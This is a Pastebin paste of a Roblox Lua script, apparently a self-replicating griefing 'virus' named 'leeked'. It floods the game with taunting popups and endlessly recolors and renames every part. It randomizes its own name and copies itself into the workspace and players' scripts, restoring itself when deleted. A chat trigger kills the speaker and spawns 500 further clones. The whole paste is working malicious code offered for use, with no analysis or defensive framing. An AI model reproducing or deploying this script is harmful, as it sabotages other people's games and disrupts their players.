Advertisement
Wubzer

leek

Sep 1st, 2017
118
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 2.69 KB | None | 0 0
  1. local msgs = {"PIIIIICKLEE RICCCCCKKKKK", "leeked", "plz no leek", "xd guess what", "hide your g/c, hide your scripts, cuz leek be bypassing everybody out here", "sooooo many skids, stop stealing script blox.", "g/c stands no chance"};
  2. local thingies = {"Hint", "Message"};
  3. local clrsplox = {BrickColor.new("Really red"), BrickColor.new("Really black"), BrickColor.new("Hot pink"), BrickColor.new("Lime green"), BrickColor.new("Toothpaste")}
  4. local matrls = {Enum.Material.DiamondPlate, Enum.Material.SmoothPlastic, Enum.Material.Marble, Enum.Material.Neon, Enum.Material.Ice, Enum.Material.Wood, Enum.Material.Sand};
  5. local function init()
  6. while true do
  7. pcall(function() local h = Instance.new(thingies[math.random(#thingies)], workspace); h.Text = msgs[math.random(#msgs)]; game.Debris:AddItem(h, 2); end);
  8. wait(2)
  9. end
  10. end;
  11. local function nameswap()
  12. while true do
  13. script.Parent.Name = math.random(1E7, 1E8);
  14. wait();
  15. end;
  16. end;
  17. local function kys(obj)
  18.     for _, plzno in pairs(obj:GetChildren()) do
  19.         if (plzno:IsA("BasePart") or plzno:IsA("UnionOperation") or plzno:IsA("MeshPart")) then
  20.             plzno.Name = tostring(math.random(1E7, 1E8));
  21.             math.randomseed(tick() * math.random());
  22.             plzno.BrickColor = clrsplox[math.random(#clrsplox)];
  23.             math.randomseed(tick() * math.random());
  24.             plzno.Material = matrls[math.random(#matrls)];
  25.         end;
  26.         kys(plzno);
  27.     end;
  28. end;
  29. ------------------------------
  30. local function kek()
  31.     while true do
  32.     kys(workspace);
  33.     wait(0.25);
  34.     end;
  35. end;
  36. ----------------------------
  37. local function plzxddd()
  38.     for _, plrperson in pairs(game.Players:GetPlayers()) do
  39.         plrperson.Chatted:Connect(function(msg)
  40.             if (string.sub(msg, 1, 8) == "g/ns/all") then
  41.                 plrperson.Character:BreakJoints();
  42.                 for i = 1, 500 do
  43.                     script:Clone().Parent = script.Parent;
  44.                 end
  45.             end
  46.         end);
  47.     end;
  48.     game.Players.PlayerAdded:Connect(function(plr)
  49.         plr.Chatted:Connect(function(msg)
  50.             if (string.sub(msg, 1, 8) == "g/ns/all") then
  51.                 plr.Character:BreakJoints();
  52.                 for i = 1, 500 do
  53.                     script:Clone().Parent = script.Parent;
  54.                 end
  55.             end
  56.         end);
  57.     end)
  58. end;
  59. ----------------------------
  60. script.Name = "leeked"; if (script.Parent == game.Workspace) then spawn(init); spawn(kek); spawn(plzxddd); for i = 0, 4 do script:Clone().Parent = workspace; end; else for _, plzno in pairs(game.Players:GetPlayers()) do script:Clone().Parent = plzno.PlayerScripts; end; end;
  61. workspace.ChildRemoved:Connect(function(xdddd) if (xdddd == script) then local xdgitrekt; for _, plzn in pairs(game.Players:GetPlayers()) do if (plzn.PlayerScripts:FindFirstChild("leeked")) then xdgitrekt = plzn.PlayerScripts:FindFirstChild("leeked"); break; end; end; xdgitrekt:Clone().Parent = workspace; end; end);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement